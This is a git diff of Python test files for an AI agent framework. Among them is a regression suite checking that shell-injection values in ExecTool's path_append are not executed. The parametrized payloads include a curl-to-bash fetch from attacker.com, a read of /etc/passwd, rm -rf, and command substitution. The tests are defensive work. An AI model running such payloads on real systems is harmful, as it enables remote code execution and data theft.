||||||
|
assert kwargs["messages"][2]["role"] == "tool"
|
||||||
|
|
||||||
|
|
||||||
|
def test_deepseek_thinking_drops_current_bad_tool_turn_without_followup_user() -> None:
|
||||||
|
kwargs = _deepseek_kwargs([
|
||||||
|
{"role": "system", "content": "system"},
|
||||||
|
{"role": "user", "content": "can we use wechat?"},
|
||||||
|
{"role": "assistant", "content": "", "tool_calls": [_tool_call("call_bad")]},
|
||||||
|
{"role": "tool", "tool_call_id": "call_bad", "name": "my", "content": "channels"},
|
||||||
|
])
|
||||||
|
|
||||||
|
assert kwargs["messages"] == [
|
||||||
|
{"role": "system", "content": "system"},
|
||||||
|
{"role": "user", "content": "can we use wechat?"},
|
||||||
|
]
|
||||||
|
|
||||||
|
|
||||||
def test_openai_compat_keeps_tool_calls_after_consecutive_assistant_messages() -> None:
|
def test_openai_compat_keeps_tool_calls_after_consecutive_assistant_messages() -> None:
|
||||||
with patch("nanobot.providers.openai_compat_provider.AsyncOpenAI"):
|
with patch("nanobot.providers.openai_compat_provider.AsyncOpenAI"):
|
||||||
provider = OpenAICompatProvider()
|
provider = OpenAICompatProvider()
|
||||||
|
|||||||
118
tests/providers/test_local_endpoint_detection.py
Normal file
118
tests/providers/test_local_endpoint_detection.py
Normal file
@ -0,0 +1,118 @@
|
|||||||
|
"""Tests for _is_local_endpoint detection and keepalive configuration."""
|
||||||
|
|
||||||
|
from unittest.mock import MagicMock
|
||||||
|
|
||||||
|
from nanobot.providers.openai_compat_provider import (
|
||||||
|
OpenAICompatProvider,
|
||||||
|
_is_local_endpoint,
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
def _make_spec(is_local: bool = False) -> MagicMock:
|
||||||
|
spec = MagicMock()
|
||||||
|
spec.is_local = is_local
|
||||||
|
return spec
|
||||||
|
|
||||||
|
|
||||||
|
class TestIsLocalEndpoint:
|
||||||
|
"""Test the _is_local_endpoint helper."""
|
||||||
|
|
||||||
|
def test_spec_is_local_true(self):
|
||||||
|
assert _is_local_endpoint(_make_spec(is_local=True), None) is True
|
||||||
|
|
||||||
|
def test_spec_is_local_false_no_base(self):
|
||||||
|
assert _is_local_endpoint(_make_spec(is_local=False), None) is False
|
||||||
|
|
||||||
|
def test_no_spec_no_base(self):
|
||||||
|
assert _is_local_endpoint(None, None) is False
|
||||||
|
|
||||||
|
def test_localhost(self):
|
||||||
|
assert _is_local_endpoint(None, "http://localhost:1234/v1") is True
|
||||||
|
|
||||||
|
def test_localhost_https(self):
|
||||||
|
assert _is_local_endpoint(None, "https://localhost:8080/v1") is True
|
||||||
|
|
||||||
|
def test_loopback_127(self):
|
||||||
|
assert _is_local_endpoint(None, "http://127.0.0.1:11434/v1") is True
|
||||||
|
|
||||||
|
def test_private_192_168(self):
|
||||||
|
assert _is_local_endpoint(None, "http://192.168.8.188:1234/v1") is True
|
||||||
|
|
||||||
|
def test_private_10(self):
|
||||||
|
assert _is_local_endpoint(None, "http://10.0.0.5:8000/v1") is True
|
||||||
|
|
||||||
|
def test_private_172_16(self):
|
||||||
|
assert _is_local_endpoint(None, "http://172.16.0.1:1234/v1") is True
|
||||||
|
|
||||||
|
def test_private_172_31(self):
|
||||||
|
assert _is_local_endpoint(None, "http://172.31.255.255:1234/v1") is True
|
||||||
|
|
||||||
|
def test_not_private_172_32(self):
|
||||||
|
assert _is_local_endpoint(None, "http://172.32.0.1:1234/v1") is False
|
||||||
|
|
||||||
|
def test_docker_internal(self):
|
||||||
|
assert _is_local_endpoint(None, "http://host.docker.internal:11434/v1") is True
|
||||||
|
|
||||||
|
def test_ipv6_loopback(self):
|
||||||
|
assert _is_local_endpoint(None, "http://[::1]:1234/v1") is True
|
||||||
|
|
||||||
|
def test_public_api(self):
|
||||||
|
assert _is_local_endpoint(None, "https://api.openai.com/v1") is False
|
||||||
|
|
||||||
|
def test_openrouter(self):
|
||||||
|
assert _is_local_endpoint(None, "https://openrouter.ai/api/v1") is False
|
||||||
|
|
||||||
|
def test_spec_overrides_public_url(self):
|
||||||
|
"""spec.is_local=True takes precedence even with a public-looking URL."""
|
||||||
|
assert _is_local_endpoint(_make_spec(is_local=True), "https://api.example.com/v1") is True
|
||||||
|
|
||||||
|
def test_case_insensitive(self):
|
||||||
|
assert _is_local_endpoint(None, "http://LOCALHOST:1234/v1") is True
|
||||||
|
|
||||||
|
def test_trailing_slash(self):
|
||||||
|
assert _is_local_endpoint(None, "http://192.168.1.1:8080/v1/") is True
|
||||||
|
|
||||||
|
def test_public_hostname_containing_localhost_is_not_local(self):
|
||||||
|
assert _is_local_endpoint(None, "https://notlocalhost.example/v1") is False
|
||||||
|
|
||||||
|
def test_public_hostname_containing_private_ip_prefix_is_not_local(self):
|
||||||
|
assert _is_local_endpoint(None, "https://api10.example.com/v1") is False
|
||||||
|
|
||||||
|
def test_url_without_scheme(self):
|
||||||
|
assert _is_local_endpoint(None, "192.168.1.1:8080/v1") is True
|
||||||
|
|
||||||
|
|
||||||
|
class TestLocalKeepaliveConfig:
|
||||||
|
"""Verify that local endpoints get keepalive_expiry=0."""
|
||||||
|
|
||||||
|
def test_local_spec_disables_keepalive(self):
|
||||||
|
spec = _make_spec(is_local=True)
|
||||||
|
spec.env_key = ""
|
||||||
|
spec.default_api_base = "http://localhost:11434/v1"
|
||||||
|
provider = OpenAICompatProvider(
|
||||||
|
api_key="test", api_base="http://localhost:11434/v1", spec=spec,
|
||||||
|
)
|
||||||
|
pool = provider._client._client._transport._pool
|
||||||
|
assert pool._keepalive_expiry == 0
|
||||||
|
|
||||||
|
def test_lan_ip_disables_keepalive(self):
|
||||||
|
"""A generic 'openai' spec with a LAN IP should still disable keepalive."""
|
||||||
|
spec = _make_spec(is_local=False)
|
||||||
|
spec.env_key = ""
|
||||||
|
spec.default_api_base = None
|
||||||
|
provider = OpenAICompatProvider(
|
||||||
|
api_key="test", api_base="http://192.168.8.188:1234/v1", spec=spec,
|
||||||
|
)
|
||||||
|
pool = provider._client._client._transport._pool
|
||||||
|
assert pool._keepalive_expiry == 0
|
||||||
|
|
||||||
|
def test_cloud_keeps_default_keepalive(self):
|
||||||
|
spec = _make_spec(is_local=False)
|
||||||
|
spec.env_key = ""
|
||||||
|
spec.default_api_base = "https://api.openai.com/v1"
|
||||||
|
provider = OpenAICompatProvider(
|
||||||
|
api_key="test", api_base=None, spec=spec,
|
||||||
|
)
|
||||||
|
pool = provider._client._client._transport._pool
|
||||||
|
# Default httpx keepalive is 5.0s
|
||||||
|
assert pool._keepalive_expiry == 5.0
|
||||||
@ -9,6 +9,17 @@ from types import SimpleNamespace
|
|||||||
from unittest.mock import patch
|
from unittest.mock import patch
|
||||||
|
|
||||||
from nanobot.providers.openai_compat_provider import OpenAICompatProvider
|
from nanobot.providers.openai_compat_provider import OpenAICompatProvider
|
||||||
|
from nanobot.providers.registry import ProviderSpec
|
||||||
|
|
||||||
|
_STEPFUN_SPEC = ProviderSpec(
|
||||||
|
name="stepfun",
|
||||||
|
keywords=("stepfun", "step"),
|
||||||
|
env_key="STEPFUN_API_KEY",
|
||||||
|
display_name="Step Fun",
|
||||||
|
backend="openai_compat",
|
||||||
|
default_api_base="https://api.stepfun.com/v1",
|
||||||
|
reasoning_as_content=True,
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
# ── _parse: dict branch ─────────────────────────────────────────────────────
|
# ── _parse: dict branch ─────────────────────────────────────────────────────
|
||||||
@ -17,7 +28,7 @@ from nanobot.providers.openai_compat_provider import OpenAICompatProvider
|
|||||||
def test_parse_dict_stepfun_reasoning_fallback() -> None:
|
def test_parse_dict_stepfun_reasoning_fallback() -> None:
|
||||||
"""When content is None and reasoning exists, content falls back to reasoning."""
|
"""When content is None and reasoning exists, content falls back to reasoning."""
|
||||||
with patch("nanobot.providers.openai_compat_provider.AsyncOpenAI"):
|
with patch("nanobot.providers.openai_compat_provider.AsyncOpenAI"):
|
||||||
provider = OpenAICompatProvider()
|
provider = OpenAICompatProvider(spec=_STEPFUN_SPEC)
|
||||||
|
|
||||||
response = {
|
response = {
|
||||||
"choices": [{
|
"choices": [{
|
||||||
@ -39,7 +50,7 @@ def test_parse_dict_stepfun_reasoning_fallback() -> None:
|
|||||||
def test_parse_dict_stepfun_reasoning_priority() -> None:
|
def test_parse_dict_stepfun_reasoning_priority() -> None:
|
||||||
"""reasoning_content field takes priority over reasoning when both present."""
|
"""reasoning_content field takes priority over reasoning when both present."""
|
||||||
with patch("nanobot.providers.openai_compat_provider.AsyncOpenAI"):
|
with patch("nanobot.providers.openai_compat_provider.AsyncOpenAI"):
|
||||||
provider = OpenAICompatProvider()
|
provider = OpenAICompatProvider(spec=_STEPFUN_SPEC)
|
||||||
|
|
||||||
response = {
|
response = {
|
||||||
"choices": [{
|
"choices": [{
|
||||||
@ -75,7 +86,7 @@ def _make_sdk_message(content, reasoning=None, reasoning_content=None):
|
|||||||
def test_parse_sdk_stepfun_reasoning_fallback() -> None:
|
def test_parse_sdk_stepfun_reasoning_fallback() -> None:
|
||||||
"""SDK branch: content falls back to msg.reasoning when content is None."""
|
"""SDK branch: content falls back to msg.reasoning when content is None."""
|
||||||
with patch("nanobot.providers.openai_compat_provider.AsyncOpenAI"):
|
with patch("nanobot.providers.openai_compat_provider.AsyncOpenAI"):
|
||||||
provider = OpenAICompatProvider()
|
provider = OpenAICompatProvider(spec=_STEPFUN_SPEC)
|
||||||
|
|
||||||
msg = _make_sdk_message(content=None, reasoning="After analysis: result is 4.")
|
msg = _make_sdk_message(content=None, reasoning="After analysis: result is 4.")
|
||||||
choice = SimpleNamespace(finish_reason="stop", message=msg)
|
choice = SimpleNamespace(finish_reason="stop", message=msg)
|
||||||
@ -90,7 +101,7 @@ def test_parse_sdk_stepfun_reasoning_fallback() -> None:
|
|||||||
def test_parse_sdk_stepfun_reasoning_priority() -> None:
|
def test_parse_sdk_stepfun_reasoning_priority() -> None:
|
||||||
"""reasoning_content field takes priority over reasoning in SDK branch."""
|
"""reasoning_content field takes priority over reasoning in SDK branch."""
|
||||||
with patch("nanobot.providers.openai_compat_provider.AsyncOpenAI"):
|
with patch("nanobot.providers.openai_compat_provider.AsyncOpenAI"):
|
||||||
provider = OpenAICompatProvider()
|
provider = OpenAICompatProvider(spec=_STEPFUN_SPEC)
|
||||||
|
|
||||||
msg = _make_sdk_message(
|
msg = _make_sdk_message(
|
||||||
content=None,
|
content=None,
|
||||||
@ -244,3 +255,44 @@ def test_parse_chunks_sdk_reasoning_precedence() -> None:
|
|||||||
result = OpenAICompatProvider._parse_chunks(chunks)
|
result = OpenAICompatProvider._parse_chunks(chunks)
|
||||||
|
|
||||||
assert result.reasoning_content == "formal: "
|
assert result.reasoning_content == "formal: "
|
||||||
|
|
||||||
|
|
||||||
|
# ── Regression: non-StepFun providers must NOT promote reasoning to content ─
|
||||||
|
|
||||||
|
|
||||||
|
def test_parse_dict_non_stepfun_no_reasoning_as_content() -> None:
|
||||||
|
"""Providers without reasoning_as_content flag must not treat reasoning as content."""
|
||||||
|
with patch("nanobot.providers.openai_compat_provider.AsyncOpenAI"):
|
||||||
|
provider = OpenAICompatProvider()
|
||||||
|
|
||||||
|
response = {
|
||||||
|
"choices": [{
|
||||||
|
"message": {
|
||||||
|
"content": None,
|
||||||
|
"reasoning": "internal thought process that should NOT be shown to user",
|
||||||
|
},
|
||||||
|
"finish_reason": "stop",
|
||||||
|
}],
|
||||||
|
}
|
||||||
|
|
||||||
|
result = provider._parse(response)
|
||||||
|
|
||||||
|
# content stays None — reasoning is NOT promoted
|
||||||
|
assert result.content is None
|
||||||
|
# reasoning still goes to reasoning_content for display as thinking
|
||||||
|
assert result.reasoning_content == "internal thought process that should NOT be shown to user"
|
||||||
|
|
||||||
|
|
||||||
|
def test_parse_sdk_non_stepfun_no_reasoning_as_content() -> None:
|
||||||
|
"""SDK branch: providers without flag must not treat reasoning as content."""
|
||||||
|
with patch("nanobot.providers.openai_compat_provider.AsyncOpenAI"):
|
||||||
|
provider = OpenAICompatProvider()
|
||||||
|
|
||||||
|
msg = _make_sdk_message(content=None, reasoning="internal monologue")
|
||||||
|
choice = SimpleNamespace(finish_reason="stop", message=msg)
|
||||||
|
response = SimpleNamespace(choices=[choice], usage=None)
|
||||||
|
|
||||||
|
result = provider._parse(response)
|
||||||
|
|
||||||
|
assert result.content is None
|
||||||
|
assert result.reasoning_content == "internal monologue"
|
||||||
|
|||||||
@ -1,4 +1,5 @@
|
|||||||
import json
|
import json
|
||||||
|
import time
|
||||||
|
|
||||||
import pytest
|
import pytest
|
||||||
|
|
||||||
@ -260,6 +261,17 @@ def test_sanitize_inbound_text_keeps_normal_inline_message(make_channel):
|
|||||||
assert ch._sanitize_inbound_text(activity) == "normal inline message"
|
assert ch._sanitize_inbound_text(activity) == "normal inline message"
|
||||||
|
|
||||||
|
|
||||||
|
def test_sanitize_inbound_text_normalizes_nbsp_entities(make_channel):
|
||||||
|
ch = make_channel()
|
||||||
|
|
||||||
|
activity = {
|
||||||
|
"text": "Hello from Teams",
|
||||||
|
"channelData": {},
|
||||||
|
}
|
||||||
|
|
||||||
|
assert ch._sanitize_inbound_text(activity) == "Hello from Teams"
|
||||||
|
|
||||||
|
|
||||||
def test_sanitize_inbound_text_normalizes_reply_wrapper_without_reply_metadata(make_channel):
|
def test_sanitize_inbound_text_normalizes_reply_wrapper_without_reply_metadata(make_channel):
|
||||||
ch = make_channel()
|
ch = make_channel()
|
||||||
|
|
||||||
@ -371,7 +383,7 @@ async def test_get_access_token_uses_configured_tenant(make_channel):
|
|||||||
|
|
||||||
|
|
||||||
@pytest.mark.asyncio
|
@pytest.mark.asyncio
|
||||||
async def test_send_replies_to_activity_when_reply_in_thread_enabled(make_channel):
|
async def test_send_posts_to_conversation_with_reply_to_id_when_reply_in_thread_enabled(make_channel):
|
||||||
ch = make_channel(replyInThread=True)
|
ch = make_channel(replyInThread=True)
|
||||||
fake_http = FakeHttpClient()
|
fake_http = FakeHttpClient()
|
||||||
ch._http = fake_http
|
ch._http = fake_http
|
||||||
@ -387,7 +399,7 @@ async def test_send_replies_to_activity_when_reply_in_thread_enabled(make_channe
|
|||||||
|
|
||||||
assert len(fake_http.calls) == 1
|
assert len(fake_http.calls) == 1
|
||||||
url, kwargs = fake_http.calls[0]
|
url, kwargs = fake_http.calls[0]
|
||||||
assert url == "https://smba.trafficmanager.net/amer/v3/conversations/conv-123/activities/activity-1"
|
assert url == "https://smba.trafficmanager.net/amer/v3/conversations/conv-123/activities"
|
||||||
assert kwargs["headers"]["Authorization"] == "Bearer tok"
|
assert kwargs["headers"]["Authorization"] == "Bearer tok"
|
||||||
assert kwargs["json"]["text"] == "Reply text"
|
assert kwargs["json"]["text"] == "Reply text"
|
||||||
assert kwargs["json"]["replyToId"] == "activity-1"
|
assert kwargs["json"]["replyToId"] == "activity-1"
|
||||||
@ -551,6 +563,38 @@ async def test_start_logs_install_hint_when_pyjwt_missing(make_channel, monkeypa
|
|||||||
assert errors == ["PyJWT not installed. Run: pip install nanobot-ai[msteams]"]
|
assert errors == ["PyJWT not installed. Run: pip install nanobot-ai[msteams]"]
|
||||||
|
|
||||||
|
|
||||||
|
def test_save_refs_prunes_webchat_and_stale_refs(make_channel):
|
||||||
|
ch = make_channel()
|
||||||
|
now = time.time()
|
||||||
|
ch._conversation_refs = {
|
||||||
|
"teams-good": ConversationRef(
|
||||||
|
service_url="https://smba.trafficmanager.net/amer/",
|
||||||
|
conversation_id="teams-good",
|
||||||
|
conversation_type="personal",
|
||||||
|
updated_at=now,
|
||||||
|
),
|
||||||
|
"webchat-bad": ConversationRef(
|
||||||
|
service_url="https://webchat.botframework.com/",
|
||||||
|
conversation_id="webchat-bad",
|
||||||
|
conversation_type=None,
|
||||||
|
updated_at=now,
|
||||||
|
),
|
||||||
|
"teams-stale": ConversationRef(
|
||||||
|
service_url="https://smba.trafficmanager.net/amer/",
|
||||||
|
conversation_id="teams-stale",
|
||||||
|
conversation_type="personal",
|
||||||
|
updated_at=now - (31 * 24 * 60 * 60),
|
||||||
|
),
|
||||||
|
}
|
||||||
|
|
||||||
|
ch._save_refs()
|
||||||
|
|
||||||
|
assert set(ch._conversation_refs) == {"teams-good"}
|
||||||
|
saved = json.loads(ch._refs_path.read_text(encoding="utf-8"))
|
||||||
|
assert set(saved) == {"teams-good"}
|
||||||
|
assert saved["teams-good"]["updated_at"] == pytest.approx(now)
|
||||||
|
|
||||||
|
|
||||||
def test_msteams_default_config_includes_restart_notify_fields():
|
def test_msteams_default_config_includes_restart_notify_fields():
|
||||||
cfg = MSTeamsChannel.default_config()
|
cfg = MSTeamsChannel.default_config()
|
||||||
|
|
||||||
|
|||||||
@ -74,3 +74,75 @@ async def test_exec_allowed_env_keys_missing_var_ignored(monkeypatch):
|
|||||||
tool = ExecTool(allowed_env_keys=["NONEXISTENT_VAR_12345"])
|
tool = ExecTool(allowed_env_keys=["NONEXISTENT_VAR_12345"])
|
||||||
result = await tool.execute(command="printenv NONEXISTENT_VAR_12345")
|
result = await tool.execute(command="printenv NONEXISTENT_VAR_12345")
|
||||||
assert "Exit code: 1" in result
|
assert "Exit code: 1" in result
|
||||||
|
|
||||||
|
|
||||||
|
# --- path_append injection prevention ------------------------------------
|
||||||
|
|
||||||
|
|
||||||
|
@_UNIX_ONLY
|
||||||
|
@pytest.mark.asyncio
|
||||||
|
@pytest.mark.parametrize(
|
||||||
|
"malicious_path",
|
||||||
|
[
|
||||||
|
# semicolon — classic command separator
|
||||||
|
'/tmp/bin; echo INJECTED',
|
||||||
|
# command substitution via $()
|
||||||
|
'/tmp/bin; echo $(whoami)',
|
||||||
|
# backtick command substitution
|
||||||
|
"/tmp/bin; echo `id`",
|
||||||
|
# pipe to another command
|
||||||
|
'/tmp/bin; cat /etc/passwd',
|
||||||
|
# chained with &&
|
||||||
|
'/tmp/bin && curl http://attacker.com/shell.sh | bash',
|
||||||
|
# newline injection
|
||||||
|
'/tmp/bin\necho INJECTED',
|
||||||
|
# mixed shell metacharacters
|
||||||
|
'/tmp/bin; rm -rf /tmp/test_inject_marker; echo CLEANED',
|
||||||
|
],
|
||||||
|
)
|
||||||
|
async def test_exec_path_append_shell_metacharacters_not_executed(malicious_path, tmp_path):
|
||||||
|
"""Shell metacharacters in path_append must NOT be interpreted as commands.
|
||||||
|
|
||||||
|
Regression test for: path_append was previously concatenated into a shell
|
||||||
|
command string via f'export PATH="$PATH:{path_append}"; {command}', which
|
||||||
|
allowed shell injection. After the fix, path_append is passed through the
|
||||||
|
env dict so metacharacters are treated as literal path characters.
|
||||||
|
"""
|
||||||
|
tool = ExecTool(path_append=malicious_path)
|
||||||
|
result = await tool.execute(command="echo SAFE_OUTPUT")
|
||||||
|
|
||||||
|
# The original command should succeed
|
||||||
|
assert "SAFE_OUTPUT" in result
|
||||||
|
|
||||||
|
# None of the injected payloads should have produced side-effects
|
||||||
|
assert "INJECTED" not in result
|
||||||
|
assert "root:" not in result # /etc/passwd content
|
||||||
|
|
||||||
|
|
||||||
|
@_UNIX_ONLY
|
||||||
|
@pytest.mark.asyncio
|
||||||
|
async def test_exec_path_append_command_substitution_does_not_execute(tmp_path):
|
||||||
|
"""$() in path_append must not trigger command substitution.
|
||||||
|
|
||||||
|
We create a marker file and try to read it via $(cat ...). If command
|
||||||
|
substitution works, the marker content appears in output.
|
||||||
|
"""
|
||||||
|
marker = tmp_path / "secret_marker.txt"
|
||||||
|
marker.write_text("SHOULD_NOT_APPEAR")
|
||||||
|
|
||||||
|
tool = ExecTool(
|
||||||
|
path_append=f'/tmp/bin; echo $(cat {marker})',
|
||||||
|
)
|
||||||
|
result = await tool.execute(command="echo OK")
|
||||||
|
|
||||||
|
assert "OK" in result
|
||||||
|
assert "SHOULD_NOT_APPEAR" not in result
|
||||||
|
|
||||||
|
|
||||||
|
@_UNIX_ONLY
|
||||||
|
@pytest.mark.asyncio
|
||||||
|
async def test_exec_path_append_legitimate_path_still_works():
|
||||||
|
"""A normal, safe path_append value must still be appended to PATH."""
|
||||||
|
tool = ExecTool(path_append="/opt/custom/bin")
|
||||||
|
result = await tool.execute(command="echo $PATH")
|
||||||
|
assert "/opt/custom/bin" in result
|
||||||
|
|||||||
@ -148,23 +148,33 @@ class TestSpawnWindows:
|
|||||||
class TestPathAppendPlatform:
|
class TestPathAppendPlatform:
|
||||||
|
|
||||||
@pytest.mark.asyncio
|
@pytest.mark.asyncio
|
||||||
async def test_unix_injects_export(self):
|
async def test_unix_uses_env_var_in_fixed_export(self):
|
||||||
"""On Unix, path_append is an export statement prepended to command."""
|
"""On Unix, path_append must not be interpolated into shell source."""
|
||||||
mock_proc = AsyncMock()
|
mock_proc = AsyncMock()
|
||||||
mock_proc.communicate.return_value = (b"ok", b"")
|
mock_proc.communicate.return_value = (b"ok", b"")
|
||||||
mock_proc.returncode = 0
|
mock_proc.returncode = 0
|
||||||
|
|
||||||
|
captured_cmd = None
|
||||||
|
captured_env = {}
|
||||||
|
|
||||||
|
async def capture_spawn(cmd, cwd, env):
|
||||||
|
nonlocal captured_cmd
|
||||||
|
captured_cmd = cmd
|
||||||
|
captured_env.update(env)
|
||||||
|
return mock_proc
|
||||||
|
|
||||||
with (
|
with (
|
||||||
patch("nanobot.agent.tools.shell._IS_WINDOWS", False),
|
patch("nanobot.agent.tools.shell._IS_WINDOWS", False),
|
||||||
patch.object(ExecTool, "_spawn", return_value=mock_proc) as mock_spawn,
|
patch("nanobot.agent.tools.shell.os.pathsep", ":"),
|
||||||
|
patch.object(ExecTool, "_spawn", side_effect=capture_spawn),
|
||||||
patch.object(ExecTool, "_guard_command", return_value=None),
|
patch.object(ExecTool, "_guard_command", return_value=None),
|
||||||
):
|
):
|
||||||
tool = ExecTool(path_append="/opt/bin")
|
tool = ExecTool(path_append="/opt/bin; echo INJECTED")
|
||||||
await tool.execute(command="ls")
|
await tool.execute(command="ls")
|
||||||
|
|
||||||
spawned_cmd = mock_spawn.call_args[0][0]
|
assert captured_cmd == 'export PATH="$PATH:$NANOBOT_PATH_APPEND"; ls'
|
||||||
assert 'export PATH="$PATH:/opt/bin"' in spawned_cmd
|
assert captured_env["NANOBOT_PATH_APPEND"] == "/opt/bin; echo INJECTED"
|
||||||
assert spawned_cmd.endswith("ls")
|
assert "INJECTED" not in captured_cmd
|
||||||
|
|
||||||
@pytest.mark.asyncio
|
@pytest.mark.asyncio
|
||||||
async def test_windows_modifies_env(self):
|
async def test_windows_modifies_env(self):
|
||||||
@ -181,6 +191,7 @@ class TestPathAppendPlatform:
|
|||||||
|
|
||||||
with (
|
with (
|
||||||
patch("nanobot.agent.tools.shell._IS_WINDOWS", True),
|
patch("nanobot.agent.tools.shell._IS_WINDOWS", True),
|
||||||
|
patch("nanobot.agent.tools.shell.os.pathsep", ";"),
|
||||||
patch.object(ExecTool, "_spawn", side_effect=capture_spawn),
|
patch.object(ExecTool, "_spawn", side_effect=capture_spawn),
|
||||||
patch.object(ExecTool, "_guard_command", return_value=None),
|
patch.object(ExecTool, "_guard_command", return_value=None),
|
||||||
):
|
):
|
||||||
|
|||||||
@ -1,6 +1,7 @@
|
|||||||
import pytest
|
import pytest
|
||||||
|
|
||||||
from nanobot.agent.tools.message import MessageTool
|
from nanobot.agent.tools.message import MessageTool
|
||||||
|
from nanobot.bus.events import OutboundMessage
|
||||||
|
|
||||||
|
|
||||||
@pytest.mark.asyncio
|
@pytest.mark.asyncio
|
||||||
@ -29,3 +30,23 @@ async def test_message_tool_rejects_malformed_buttons(bad) -> None:
|
|||||||
content="hi", channel="telegram", chat_id="1", buttons=bad,
|
content="hi", channel="telegram", chat_id="1", buttons=bad,
|
||||||
)
|
)
|
||||||
assert result == "Error: buttons must be a list of list of strings"
|
assert result == "Error: buttons must be a list of list of strings"
|
||||||
|
|
||||||
|
|
||||||
|
@pytest.mark.asyncio
|
||||||
|
async def test_message_tool_marks_channel_delivery_only_when_enabled() -> None:
|
||||||
|
sent: list[OutboundMessage] = []
|
||||||
|
|
||||||
|
async def _send(msg: OutboundMessage) -> None:
|
||||||
|
sent.append(msg)
|
||||||
|
|
||||||
|
tool = MessageTool(send_callback=_send)
|
||||||
|
|
||||||
|
await tool.execute(content="normal", channel="telegram", chat_id="1")
|
||||||
|
token = tool.set_record_channel_delivery(True)
|
||||||
|
try:
|
||||||
|
await tool.execute(content="cron", channel="telegram", chat_id="1")
|
||||||
|
finally:
|
||||||
|
tool.reset_record_channel_delivery(token)
|
||||||
|
|
||||||
|
assert sent[0].metadata == {}
|
||||||
|
assert sent[1].metadata == {"_record_channel_delivery": True}
|
||||||
|
|||||||
Loading…
x
Reference in New Issue
Block a user